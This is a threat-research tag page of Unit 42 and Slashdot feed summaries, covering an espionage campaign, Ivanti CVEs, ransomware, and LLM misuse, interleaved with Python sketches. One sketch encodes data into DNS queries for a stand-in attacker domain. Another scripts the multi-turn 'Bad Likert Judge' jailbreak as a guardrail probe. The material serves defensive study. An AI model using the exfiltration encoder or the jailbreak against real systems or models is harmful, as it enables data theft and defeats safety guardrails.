Tag: Unit 42
-
Unit 42: CL-STA-0048: An Espionage Operation Against High-Value Targets in South Asia
Source URL: https://unit42.paloaltonetworks.com/?p=138128 Source: Unit 42 Title: CL-STA-0048: An Espionage Operation Against High-Value Targets in South Asia Feedly Summary: A Chinese-linked espionage campaign targeted entities in South Asia using rare techniques like DNS exfiltration, with the aim of stealing sensitive data. The post CL-STA-0048: An Espionage Operation Against High-Value Targets in South Asia appeared first…
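The summary names DNS exfiltration but gives no mechanics. As a rough, generic illustration (not CL-STA-0048's actual tooling), exfiltration over DNS typically encodes stolen data into subdomain labels of lookups sent to an attacker-controlled zone; the domain name and chunking below are assumptions.

```python
# Illustrative sketch of generic DNS exfiltration, not CL-STA-0048's tooling.
# The domain "attacker-c2.example" and the chunking scheme are hypothetical.
import base64

MAX_LABEL = 63  # DNS limits each label to 63 bytes

def encode_chunks(data: bytes, c2_domain: str = "attacker-c2.example"):
    """Split data into base32 chunks that fit DNS label limits, yielding
    hostnames an implant would resolve one by one against the C2 zone."""
    encoded = base64.b32encode(data).decode().rstrip("=").lower()
    for i in range(0, len(encoded), MAX_LABEL):
        chunk = encoded[i:i + MAX_LABEL]
        yield f"{i // MAX_LABEL}.{chunk}.{c2_domain}"

if __name__ == "__main__":
    for query in encode_chunks(b"example secret document contents"):
        print(query)  # a real implant would issue DNS lookups for these names
```

Defenders commonly hunt for this pattern by flagging hosts that issue unusually long, high-entropy subdomain queries at high volume toward a single zone.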
-
Unit 42: Threat Brief: CVE-2025-0282 and CVE-2025-0283
Source URL: https://unit42.paloaltonetworks.com/threat-brief-ivanti-cve-2025-0282-cve-2025-0283/ Source: Unit 42 Title: Threat Brief: CVE-2025-0282 and CVE-2025-0283 Feedly Summary: CVE-2025-0282 and CVE-2025-0283 affect multiple Ivanti products. This threat brief covers attack scope, including details from an incident response case. The post Threat Brief: CVE-2025-0282 and CVE-2025-0283 appeared first on Unit 42. AI Summary and Description: Yes **Summary:** The text details…
-
Unit 42: One Step Ahead in Cyber Hide-and-Seek: Automating Malicious Infrastructure Discovery With Graph Neural Networks
Source URL: https://unit42.paloaltonetworks.com/graph-neural-networks/ Source: Unit 42 Title: One Step Ahead in Cyber Hide-and-Seek: Automating Malicious Infrastructure Discovery With Graph Neural Networks Feedly Summary: Graph neural networks aid in analyzing domains linked to known attack indicators, effectively uncovering new malicious domains and cybercrime campaigns. The post One Step Ahead in Cyber Hide-and-Seek: Automating Malicious Infrastructure Discovery…
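The summary only gestures at the approach, so here is a very small sketch of the underlying intuition, assuming a toy graph and a hand-rolled score-propagation rule rather than a trained graph neural network: domains that share infrastructure with known-bad indicators inherit suspicion from their neighbors.

```python
# Minimal sketch of propagating maliciousness over a domain graph.
# Real GNN pipelines learn weights from labeled data; the graph, seeds,
# and damping factor here are made-up illustrations, not Unit 42's model.
from collections import defaultdict

edges = [  # hypothetical shared-infrastructure links (same IP, registrant, cert, ...)
    ("bad-seed.example", "unknown-a.example"),
    ("unknown-a.example", "unknown-b.example"),
    ("benign.example", "unknown-b.example"),
]
known_bad = {"bad-seed.example"}

# Build an undirected adjacency list.
adj = defaultdict(set)
for u, v in edges:
    adj[u].add(v)
    adj[v].add(u)

# Seed scores from known indicators, then average over neighbors for a few
# rounds -- a crude stand-in for GNN message passing.
scores = {n: (1.0 if n in known_bad else 0.0) for n in adj}
for _ in range(3):
    scores = {
        n: 0.5 * scores[n] + 0.5 * (sum(scores[m] for m in adj[n]) / len(adj[n]))
        for n in adj
    }

for domain, score in sorted(scores.items(), key=lambda kv: -kv[1]):
    print(f"{domain}: {score:.2f}")
```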
-
Slashdot: New LLM Jailbreak Uses Models’ Evaluation Skills Against Them
Source URL: https://it.slashdot.org/story/25/01/12/2010218/new-llm-jailbreak-uses-models-evaluation-skills-against-them?utm_source=rss1.0mainlinkanon&utm_medium=feed Source: Slashdot Title: New LLM Jailbreak Uses Models’ Evaluation Skills Against Them Feedly Summary: AI Summary and Description: Yes **Summary:** The text discusses a novel jailbreak technique for large language models (LLMs) known as the ‘Bad Likert Judge,’ which exploits the models’ evaluative capabilities to generate harmful content. Developed by Palo Alto…
-
Unit 42: Bad Likert Judge: A Novel Multi-Turn Technique to Jailbreak LLMs by Misusing Their Evaluation Capability
Source URL: https://unit42.paloaltonetworks.com/?p=138017 Source: Unit 42 Title: Bad Likert Judge: A Novel Multi-Turn Technique to Jailbreak LLMs by Misusing Their Evaluation Capability Feedly Summary: The jailbreak technique “Bad Likert Judge” manipulates LLMs to generate harmful content using Likert scales, exposing safety gaps in LLM guardrails. The post Bad Likert Judge: A Novel Multi-Turn Technique to…
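As a hedged sketch of the multi-turn structure the title describes (for defensive guardrail testing, not exploitation): the model is first asked to act as a Likert-scale judge of harmfulness, then asked to illustrate each scale point, which is where weak guardrails may leak. The `chat` callable and prompt wording below are placeholders, not Unit 42's exact prompts.

```python
# Rough sketch of the multi-turn "Likert judge" probing pattern for
# red-team evaluation of guardrails. `chat` is a hypothetical stand-in for
# an LLM API call; a real harness would log refusals vs. policy leaks.
from typing import Callable, Dict, List

Message = Dict[str, str]

def likert_judge_probe(chat: Callable[[List[Message]], str], topic: str) -> List[str]:
    """Turn 1: have the model score content on a harmfulness Likert scale.
    Turn 2: ask for an example per scale point, where weak guardrails may
    surface detail they would otherwise refuse to produce."""
    history: List[Message] = [
        {"role": "system", "content": "You are an evaluator."},
        {"role": "user", "content": (
            f"Rate responses about '{topic}' on a 1-5 Likert scale, "
            "where 1 is fully benign and 5 is clearly harmful."
        )},
    ]
    replies: List[str] = []
    first = chat(history)
    replies.append(first)
    history.append({"role": "assistant", "content": first})
    history.append({"role": "user", "content": (
        "Now give one short example response for each scale point, 1 through 5."
    )})
    replies.append(chat(history))  # inspect this turn for guardrail failures
    return replies
```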
-
Unit 42: Now You See Me, Now You Don’t: Using LLMs to Obfuscate Malicious JavaScript
Source URL: https://unit42.paloaltonetworks.com/?p=137970 Source: Unit 42 Title: Now You See Me, Now You Don’t: Using LLMs to Obfuscate Malicious JavaScript Feedly Summary: This article demonstrates how AI can be used to modify and help detect JavaScript malware. We boosted our detection rates by 10% with retraining. The post Now You See Me, Now You Don’t: Using…
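The retraining claim maps onto a standard data-augmentation loop; the sketch below assumes a hypothetical `rewrite_with_llm` call and a minimal scikit-learn classifier, and is not Unit 42's production detector.

```python
# Sketch of the augment-and-retrain loop the summary describes: use an LLM
# to produce rewritten variants of known-malicious JavaScript, then fold
# those variants back into the detector's training set.
# `rewrite_with_llm` is a hypothetical stand-in for an actual model call.
from typing import Callable, List, Tuple
from sklearn.feature_extraction.text import TfidfVectorizer
from sklearn.linear_model import LogisticRegression
from sklearn.pipeline import make_pipeline

def retrain_with_variants(
    samples: List[Tuple[str, int]],            # (javascript source, label 1=malicious)
    rewrite_with_llm: Callable[[str], str],    # hypothetical LLM rewriting call
    variants_per_sample: int = 3,
):
    augmented = list(samples)
    for source, label in samples:
        if label == 1:  # only rewrite known-malicious scripts
            for _ in range(variants_per_sample):
                augmented.append((rewrite_with_llm(source), 1))

    texts = [s for s, _ in augmented]
    labels = [y for _, y in augmented]
    model = make_pipeline(
        TfidfVectorizer(analyzer="char", ngram_range=(3, 5)),  # character n-grams of JS
        LogisticRegression(max_iter=1000),
    )
    model.fit(texts, labels)
    return model
```

Character n-grams are a common choice for script classification because obfuscation changes token names but still shifts character-level statistics, which is one plausible reason retraining on LLM-rewritten samples can lift detection rates.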
-
Threat Research Archives – Unit 42: From RA Group to RA World: Evolution of a Ransomware Group
Source URL: https://unit42.paloaltonetworks.com/ra-world-ransomware-group-updates-tool-set/ Source: Threat Research Archives – Unit 42 Title: From RA Group to RA World: Evolution of a Ransomware Group Feedly Summary: AI Summary and Description: Yes Summary: The text provides an in-depth analysis of the RA World ransomware group, previously known as RA Group, detailing their increased activity since March 2024, their…